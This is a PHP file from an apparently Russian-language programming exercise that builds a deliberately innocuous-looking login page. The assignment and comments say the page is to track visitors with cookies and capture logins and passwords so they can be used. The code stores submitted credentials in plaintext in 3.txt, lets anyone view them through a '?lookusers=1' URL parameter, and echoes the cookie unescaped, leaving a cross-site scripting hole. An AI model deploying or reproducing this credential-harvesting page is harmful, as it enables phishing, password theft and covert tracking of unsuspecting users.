<?php
/*
Задание №3.

Раз мы уже посмотрели на то, что есть в сети, то можно внедряться куда глубже. Давайте создадим страницу, пока что тренировочную. С приветственным письмом и обязательно ни разу не подозрительным. Также нам нужно будет отслеживать, кто заходил на этот сайт. Ведь нам нужно ещё отслеживать их перемещения в сети. А также формой с логином и паролем, вдруг кто то что то напутает и введёт не те данные, а мы как раз ими воспользуемся.

 

Ваша задача:

Создать страницу, на которой будет непримечательное приветственное письмо и которое будет оставлять крошки cookies для отслеживания потенциальных гостей. Под которой будет форма для введения логина и пароля.
*/
function htmlEnd() {//создадим функцию для валидности html-кода при ошибке и выходе из скрипта
	//скрипт не предназначен для консоли, поэтому здесь нет условия. См. 1.php
	echo PHP_EOL."    </div>".PHP_EOL."</body>".PHP_EOL."</html>";
}
?>
<html>
<head>
    <title>Логин</title>
</head>
<body style="background: #99bbdd">
<div style="background: #ffffff;width: 500px; margin:10px auto; padding: 25px;border-radius: 15px;"><?php

if ($_GET["lookusers"] === '1') {//просмотр тех, кто оставил свои логины и пароли на https://st.o-les.ru/_php_st/proj/3.php?lookusers=1
	$usersfile = "3.txt";//возьмём файл 3.txt
	$userstext = file_get_contents($usersfile);//отправим его содержимое в переменную
	echo '<pre>'.$userstext.'</pre>';//выведем содержимое 3.txt
	htmlEnd();exit;
}

//var_dump($_COOKIE["name"]);//задана ли cookie с именем пользователя?

//Создадим функцию, для создания cookies, так как придётся обращаться к этому несколько раз
function setCookieName() {
	global $name;//используем переменную из-за пределов функции, поэтому сначала укажем, что она - global
	setcookie("name", $name);//установим cookie с Названием name и значением переменной имя пользователя
}

//var_dump($_POST);//здесь можно посмотреть, отправлялась ли форма

if (!empty($_POST)) {//проверяем, отправлялась ли форма
    $name = !empty($_POST['login']) ? $_POST['login'] : '';//присвоим логин переменной $name
    if ($name === '') {//если логин пустой, то выведем ошибку и логгировать ничего не будем
    	echo "Логин пустой!<br/><a href=\"3.php\">Попробовать ещё раз</a>";htmlEnd();exit;
    }
    setCookieName();//установим куки с именем пользователя
    $pass = !empty($_POST['pass']) ? $_POST['pass'] : '';//присвоим логин переменной $pass
    $usersfile = "3.txt";//возьмём файл 3.txt
    $userstext = file_get_contents($usersfile);//отправим его содержимое в переменную
    $userstext .= "\r\nЛогин: " . $name . " пароль: " . $pass;//добавим строку с новыми данными
    file_put_contents($usersfile, $userstext);//запишем новую строку в файл 3.txt
    echo "Успешно записано!<br/><a href=\"3.php\">В личный кабинет</a>";htmlEnd();exit;//после отправки форма очищается и юзер не знает, что данные его у нас. Поэтому, чтобы второй раз форму не отправлял, сообщим ему, что форму приняли и отображать форму мы уже не будем.
} elseif ($_COOKIE["name"] === NULL) {//проверим, если пользователь ранее не был на нашем сайте, то назовём его 'noname'
$name = 'noname';
setCookieName();
}


if ($_COOKIE["name"] === NULL || $_COOKIE["name"] === 'noname' || $name === 'noname') { //проверим, знаем ли мы этого юзера
//Если не знаем, то вот ему форма для регистрации:
?>
	<strong>Для входа в систему введите логин и пароль</strong>
<form action="3.php" method="post">
    <label>
        Логин: <input type="text" name="login">
    </label>
    <br>
    <label>
        Пароль: <input type="password" name="pass">
    </label>
    <br>
    <input type="submit" value="Отправить">
</form>
<?php
} else {
//А если знаем, то поприветствуем его:
	echo "Мы вас узнали, " . $_COOKIE["name"] . "<br/>";
}

htmlEnd();//</div></body></html>